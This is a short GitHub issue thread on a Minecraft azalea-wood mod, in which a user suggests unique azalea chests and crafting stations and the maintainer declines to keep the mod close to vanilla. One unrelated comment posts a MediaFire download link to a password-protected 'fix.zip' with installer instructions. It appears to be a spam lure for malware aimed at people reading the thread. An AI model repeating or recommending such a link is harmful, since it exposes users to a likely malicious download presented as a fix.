### ISSUE TITLE
More of a suggestion

### ISSUE THREAD

**Issue by BatJPJonyGod** [Fire-Horse27/azalea-wood#11]
Hi! I really like the mod, but as someone who use mods to give unique chests and crafting stations to all type of woods, i'd like to see some unique to the azalea if possible and if you like the idea. Thank you!

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Fire-Horse27** [comment]
I want to keep this mod as close to vanilla as possible, so I won't be adding any unique chest and crafting station variants myself. If others would like to make a mod that uses these textures to do such a thing, they are welcome to!
